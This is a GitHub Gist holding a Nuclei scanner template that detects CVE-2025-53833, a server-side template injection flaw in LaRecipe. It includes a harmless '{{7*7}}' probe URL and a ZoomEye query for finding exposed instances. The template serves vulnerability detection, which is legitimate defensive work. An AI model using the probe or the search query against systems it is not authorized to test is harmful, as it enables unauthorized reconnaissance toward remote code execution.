Last active
October 12, 2025 00:37
-
-
Save bolhasec/0baea7ce3e47531a49ecfa03e216defa to your computer and use it in GitHub Desktop.
Nuclei Template for CVE-2025-53833
This file contains hidden or bidirectional Unicode text that may be interpreted or compiled differently than what appears below. To review, open the file in an editor that reveals hidden Unicode characters.
Learn more about bidirectional Unicode characters
| id: CVE-2025-53833 | |
| info: | |
| name: LaRecipe is vulnerable to Server-Side Template Injection attacks | |
| author: sushicomabacate | |
| severity: critical | |
| description: | | |
| LaRecipe is an application that allows users to create documentation with Markdown inside a Laravel app. Versions prior to 2.8.1 are vulnerable to Server-Side Template Injection (SSTI), which could potentially lead to Remote Code Execution (RCE) in vulnerable configurations. Attackers could execute arbitrary commands on the server, access sensitive environment variables, and/or escalate access depending on server configuration. Users are strongly advised to upgrade to version v2.8.1 or later to receive a patch. | |
| reference: | |
| - https://www.cve.org/CVERecord?id=CVE-2025-53833 | |
| classification: | |
| cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H | |
| cvss-score: 10 | |
| cve-id: CVE-2025-53833 | |
| cwe-id: CWE-1336 | |
| epss-score: | |
| epss-percentile: | |
| cpe: --- | |
| metadata: | |
| verified: true | |
| max-request: 1 | |
| vendor: ---- | |
| product: ---- | |
| shodan-query: ---- | |
| fofa-query: | |
| zoomeye-query: "LaRecipe" | |
| hunter-query: | |
| tags: | |
| http: | |
| - method: GET | |
| path: | |
| - "{{BaseURL}}/docs/1.0?poc={{7*7}}" | |
| matchers-condition: and | |
| matchers: | |
| - type: word | |
| part: body | |
| words: | |
| - "/docs/1.0?poc=49" | |
| condition: and | |
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment